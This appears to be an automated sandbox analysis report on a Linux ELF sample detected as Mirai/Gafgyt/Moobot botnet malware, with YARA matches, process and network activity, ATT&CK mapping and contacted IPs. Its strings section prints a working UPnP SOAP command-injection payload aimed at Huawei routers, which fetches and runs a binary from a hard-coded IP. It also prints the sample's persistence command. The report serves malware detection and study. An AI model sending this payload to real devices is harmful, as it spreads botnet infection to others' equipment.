          Source: OMnylKuNNF.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1e0c5ce0 reference_sample = 5b1f95840caebf9721bf318126be27085ec08cf7881ec64a884211a934351c2d, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8e45538b59f9c9b8bc49661069044900c8199e487714c715c1b1f970fd528e3b, id = 1e0c5ce0-3b76-4da4-8bed-2e5036b6ce79, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: Process Memory Space: OMnylKuNNF.elf PID: 6227, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engineClassification label: mal96.troj.linELF@0/0@1/0

          Persistence and Installation Behavior

          barindex
          Sets full permissions to files and/or directories
          Source: /bin/sh (PID: 6231)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/systemd
          Source: /bin/sh (PID: 6230)Mkdir executable: /usr/bin/mkdir -> mkdir bin
          Source: /bin/sh (PID: 6231)Chmod executable: /usr/bin/chmod -> chmod 777 bin/systemd
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/6234/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/6235/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1582/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/3088/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/230/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/110/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/231/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/111/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/232/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1579/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/112/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/233/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1699/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/113/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/234/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1335/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1698/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/114/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/235/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1334/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1576/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/2302/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/115/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/236/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/116/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/237/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/117/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/118/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/910/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/119/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/912/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/10/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/2307/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/11/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/918/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/12/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/13/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/14/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/15/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/16/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/17/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/18/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1594/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/120/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/121/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1349/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/122/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/243/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/123/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/2/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/124/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/3/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/4/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/125/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/126/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1344/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1465/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1586/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/127/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/6/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/248/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/128/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/249/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1463/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/800/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/9/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/801/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/20/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/21/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1900/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/22/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/23/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/24/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/25/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/26/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/27/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/28/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/29/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/491/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/250/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/130/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/251/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/252/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/132/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/253/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/254/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/255/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/256/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1599/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/257/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1477/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/379/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/258/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1476/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/259/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1475/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/936/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/30/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/2208/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/35/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1809/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/1494/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/260/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6233)File opened: /proc/261/cmdline
          Source: /tmp/OMnylKuNNF.elf (PID: 6228)Shell command executed: sh -c "rm -rf bin/systemd && mkdir bin; >2\\xffbin/systemd && mv /tmp/OMnylKuNNF.elf bin/systemd; chmod 777 bin/systemd"
          Source: /bin/sh (PID: 6229)Rm executable: /usr/bin/rm -> rm -rf bin/systemd
          Source: submitted sampleStderr: sh: 1: cannot create 2bin/systemd: Directory nonexistentchmod: cannot access 'bin/systemd': No such file or directory: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 54656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59102 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59102
          Source: unknownNetwork traffic detected: HTTP traffic on port 40346 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39138
          Source: unknownNetwork traffic detected: HTTP traffic on port 39372 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 39372
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52978 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52978
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48276 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 48276
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53290 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55812 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53290
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 55812
          Source: unknownNetwork traffic detected: HTTP traffic on port 43698 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49098 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47544 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 47544
          Source: unknownNetwork traffic detected: HTTP traffic on port 36620 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58844 -> 37215

          Stealing of Sensitive Information

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: OMnylKuNNF.elf, type: SAMPLE
          Source: Yara matchFile source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: OMnylKuNNF.elf, type: SAMPLE
          Source: Yara matchFile source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: OMnylKuNNF.elf, type: SAMPLE
          Source: Yara matchFile source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: OMnylKuNNF.elf, type: SAMPLE
          Source: Yara matchFile source: 6227.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting          		Path InterceptionPath Interception1
          File and Directory Permissions Modification          		1
          OS Credential Dumping          		System Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Scripting          		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          File Deletion          		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud

          Malware Configuration

          No configs have been found

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831159 Sample: OMnylKuNNF.elf Startdate: 21/03/2023 Architecture: LINUX Score: 96 25 j.xnyidc.top 2->25 27 197.213.188.40 ZAIN-ZAMBIAZM Zambia 2->27 29 99 other IPs or domains 2->29 31 Snort IDS alert for network traffic 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 5 other signatures 2->37 8 OMnylKuNNF.elf 2->8         started        signatures3 process4 process5 10 OMnylKuNNF.elf sh 8->10         started        12 OMnylKuNNF.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 OMnylKuNNF.elf 12->21         started        23 OMnylKuNNF.elf 12->23         started        signatures7 39 Sets full permissions to files and/or directories 14->39

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          OMnylKuNNF.elf56%ReversingLabsLinux.Trojan.Gafgyt
          OMnylKuNNF.elf58%VirustotalBrowse
          OMnylKuNNF.elf100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          j.xnyidc.top13%VirustotalBrowse

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          j.xnyidc.top
          		156.224.24.249
          		truetrueunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/OMnylKuNNF.elffalse
            		high
            http://schemas.xmlsoap.org/soap/envelope/OMnylKuNNF.elffalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              157.182.219.13
              		unknownUnited States
              		12118WVUUSfalse
              41.145.46.68
              		unknownSouth Africa
              		5713SAIX-NETZAfalse
              157.181.17.237
              		unknownHungary
              		2012ELTENETELTENETHUfalse
              41.240.15.46
              		unknownSudan
              		36998SDN-MOBITELSDfalse
              197.21.53.59
              		unknownTunisia
              		37693TUNISIANATNfalse
              41.35.69.95
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              39.145.25.203
              		unknownChina
              		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
              71.197.70.235
              		unknownUnited States
              		7922COMCAST-7922USfalse
              197.77.89.90
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              197.95.1.86
              		unknownSouth Africa
              		10474OPTINETZAfalse
              157.7.0.253
              		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
              157.170.12.73
              		unknownUnited States
              		22192SSHENETUSfalse
              204.81.97.207
              		unknownCanada
              		17120NBDOE-ORGCAfalse
              183.168.225.48
              		unknownChina
              		4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
              41.86.185.127
              		unknownTanzania United Republic of
              		22354UNIV-DARTZfalse
              157.120.16.193
              		unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
              41.73.84.241
              		unknownunknown
              		37004Suburban-Broadband-ASNGfalse
              197.193.207.47
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              41.64.208.72
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              64.254.157.166
              		unknownUnited States
              		16941CENTURYLINK-LEGACY-FUSEPOINT-CTS-CANADA-POPUSfalse
              197.237.113.184
              		unknownKenya
              		15399WANANCHI-KEfalse
              41.57.232.49
              		unknownGhana
              		37103BUSYINTERNETGHfalse
              41.35.69.81
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              41.24.66.201
              		unknownSouth Africa
              		36994Vodacom-VBZAfalse
              104.80.188.21
              		unknownUnited States
              		20940AKAMAI-ASN1EUfalse
              105.49.113.103
              		unknownKenya
              		33771SAFARICOM-LIMITEDKEfalse
              197.228.40.230
              		unknownSouth Africa
              		37457Telkom-InternetZAfalse
              182.42.172.84
              		unknownChina
              		58519CHINATELECOM-CTCLOUDCloudComputingCorporationCNfalse
              41.245.242.102
              		unknownNigeria
              		328050Intercellular-Nigeria-ASNGfalse
              41.206.191.253
              		unknownSouth Africa
              		6453AS6453USfalse
              41.138.190.27
              		unknownNigeria
              		20598CYBERSPACE-ASAutonomousSystemnumberforCyberSpaceILfalse
              157.119.196.248
              		unknownChina
              		2516KDDIKDDICORPORATIONJPfalse
              41.129.114.57
              		unknownEgypt
              		24863LINKdotNET-ASEGfalse
              197.208.144.185
              		unknownSudan
              		36998SDN-MOBITELSDfalse
              146.35.183.63
              		unknownUnited States
              		197938TRAVIANGAMESDEfalse
              197.159.165.38
              		unknownSao Tome and Principe
              		328191CST-NET-ASSTfalse
              217.42.122.175
              		unknownUnited Kingdom
              		2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
              157.222.228.74
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              131.148.28.104
              		unknownUnited States
              		33363BHN-33363USfalse
              41.168.23.217
              		unknownSouth Africa
              		36937Neotel-ASZAfalse
              157.29.93.250
              		unknownItaly
              		8968BT-ITALIAITfalse
              157.29.93.252
              		unknownItaly
              		8968BT-ITALIAITfalse
              157.28.126.236
              		unknownItaly
              		8968BT-ITALIAITfalse
              197.193.207.28
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              197.115.12.123
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              64.60.19.216
              		unknownUnited States
              		14265US-TELEPACIFICUSfalse
              197.213.188.40
              		unknownZambia
              		37287ZAIN-ZAMBIAZMfalse
              41.201.35.221
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              197.28.73.132
              		unknownTunisia
              		37492ORANGE-TNfalse
